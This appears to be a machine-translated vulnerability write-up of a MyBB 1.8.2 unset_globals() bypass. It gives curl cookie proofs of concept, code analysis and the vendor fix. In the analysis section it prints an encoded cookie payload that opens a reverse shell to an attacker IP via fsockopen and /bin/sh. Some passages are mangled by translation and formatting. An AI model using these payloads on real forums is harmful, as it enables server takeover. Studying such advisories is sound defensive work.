MyBB <= 1.8.2 unset_globals () Function Bypass and Remote Code Execution (Reverse Shell explo.

Catalogue

1. Vulnerability Description 2. Vulnerability trigger Condition 3. Vulnerability Impact Range 4. Vulnerability Code Analysis 5. Defense Method 6. Defensive thinking

1. Vulnerability description

MyBB ' s unset_globals () function can be bypassed under special conditions and it's possible to allows remote code Executio N.

Relevant Link:

https://cxsecurity.com/issue/WLB-2015120164https://packetstormsecurity.com/files/134833/ mybb-1.8.2-code-execution.htmlhttps://www.exploit-db.com/exploits/35323/

2. Vulnerability Trigger Condition

0x1:poc1

PHP.ini configuration 1. Request_order = "GP" 2. register_globals = on//remote code execution by just using Curl on the command line3. Curl--cookie "Globals=1; Shutdown_functions[0][function]=phpinfo; Shutdown_functions[0][arguments][]=-1 "http://30.9.192.207/mybb_1802/

PHP Automated Validation Scripts

0x2:poc2

Php.ini1. Disable_functions = Ini_get2. Register_globals = On//url3. Index.php?shutdown_functions[0][function]=phpinfo&shutdown_functions[0][arguments][]=-1

0x3:poc3

PHP.ini configuration 1. Request_order = "GP" 2. Register_globals = On//urlcurl--cookie "Globals=1; Shutdown_queries[]=sql_inj "Http://www.target/css.php//Works on disable_functions = ini_get and register\_globals = on: Css.php?shutdown_queries[]=sql_inj

3. Vulnerability Impact Range

MYBB 1.8 <= 1.8.2 and MYBB 1.6 <= 1.6.15

4. Vulnerability Code Analysis

\mybb_1802\inc\class_core.php

. If we ' ve got register globals on, then kill them Too/*when PHP's register_globals configuration set on, MYBB would call Unset_globals () Functionall global variables registered by PHP from $_post, $_get, $_files, and $_cookie arrays would be de Stroyed. This is a security mechanism that MYBB does, at the beginning of each PHP script request, "Hyper global variable Autoenrollment reverse processing", to counteract the security issues that may arise from the Register_globals */if (@ini_get ("Register_    Globals ") = = 1) {$this->unset_globals ($_post);    $this->unset_globals ($_get);    $this->unset_globals ($_files); $this->unset_globals ($_cookie);}. /** * Unsets globals from a specific array. * * @param array the array to unset from.    */function unset_globals ($array) {if (!is_array ($array)) {return;        } foreach (Array_keys ($array) as $key) {unset ($GLOBALS [$key]); Unset ($GLOBALS [$key]); Double unset to circumvent the zend_hash_del_key_or_index hole in PHP <4.4.3 and <5.1.4}} 

This logic seems to be fine, and it is defensive for security reasons, but because of some features of the PHP kernel, the execution of the Unset_globals () function can be bypassed

1. Under normal circumstances, through the GPC mode input variable, even if the register_globals is turned on, it will be automatically unset $GLOBAL [$var] processing, which is mybb himself to implement a set of defense low version of PHP error Register_ Globals = on code logic, which defends against the occurrence of local variable overrides 2. But there is a special variable GLOBALS, $GLOBALS Super Global array is the PHP kernel is responsible for creating maintenance, we can read and write anywhere in the program $globals[' key '],php kernel bound $globals array and global symbol The connection between table 3. If the hacker comes in: foo.php? Globals=1, the MYBB executes unset ($GLOBALS ["GLOBALS"]), which directly results in a connection between $globals and the global symbol table 4. And this direct result is $_get, $_post, $_cookie. Can no longer obtain the user passed in the parameter key, because the intrinsic GPC parameters are obtained from the $globals, so the unset operation will not work properly

It is important to note that this problem is noted in MyBB's defensive framework \mybb_1802\inc\class_core.php

.. function __construct () {    //Set up mybb    $protected = Array ("_get", "_post", "_server", "_cookie", "_files", "_env" , "GLOBALS");    foreach ($protected as $var)    {        if (isset ($_request[$var]) | | isset ($_files[$var])        {die            ("Hacking Attempt ");        }    }    ..

MyBB's intention is to prevent get/post/globals in the request parameter, which may affect the parameters of global variables, but the problem in PHP $_request is also a super-global variable, its value is affected by php.ini, after PHP5.3, request_ Order = "GP", that is, the $_request only includes the parameters in the Get/post, which leads directly to the filtering of the sensitive parameters of the cookie, so the hacker can put a variable overlay attack in the cookie payload

Globals=1; Shutdown_functions[0][function]=exec; shutdown_functions[0][arguments][]=php%20%2dr%20%27%24sock%3dfsockopen%28%22$yourip%22%2c%204444%29%3bexec%28% 22%2fbin%2fsh%20%2di%20%3c%263%20%3e%263%202%3e%263%22%29%3b%27;

To sum it up, there are 2 scenarios for the use of the prerequisites

Understanding the premise of the variable overlay, the next step is to see how the attack payload constructs and triggers a local variable overlay \mybb_1802\inc\class_core.php

class_core.php almost all page scripts will be called to the file, the following destructor will be frequently called function __destruct () {    //Run shutdown function    if (function _exists ("Run_shutdown"))    {        run_shutdown ();    }}

Run_shutdown (); \mybb_1802\inc\functions.php

/** * Runs The shutdown items after the page have been sent to the browser. * */function Run_shutdown () {    //the $shutdown _functions is initialized via Add\_shutdown () function in init.php    But because of the existence of local variable coverage vulnerability, here $shutdown_functions can be hijacked    global $config, $db, $cache, $plugins, $error _handler, $shutdown _ Functions, $shutdown _queries, $done _shutdown, $mybb;    if ($done _shutdown = = True | |! $config | | (Isset ($error _handler) && $error _handler->has_errors))    {        return;    }    .    . Run Any shutdown functions if we have them    if (Is_array ($shutdown _functions))    {        foreach ($shutdown _ functions as $function)        {            Call_user_func_array ($function [' function '], $function [' arguments ']);        }    }    ..

Relevant Link:

http://0day.today/exploit/22913

5. Defense Methods

\inc\class_core.php

Class MyBB {    ...    function __construct ()    {        //Set up mybb        $protected = Array ("_get", "_post", "_server", "_cookie", "_files", " _env "," GLOBALS ");        foreach ($protected as $var)        {            /*if (isset ($_request[$var)) | | isset ($_files[$var)) */            if (Isset ($_get[$ var]) | | Isset ($_post[$var]) | | Isset ($_cookie[$var]) | | Isset ($_files[$var])            {die                ("Hacking attempt");}        }        ..

Relevant Link:

http://blog.mybb.com/2014/11/20/mybb-1-8-3-1-6-16-released-security-releases/http://cn.313.ninja/exploit/22913

6. Defensive Thinking

Copyright (c) Little5ann All rights reserved

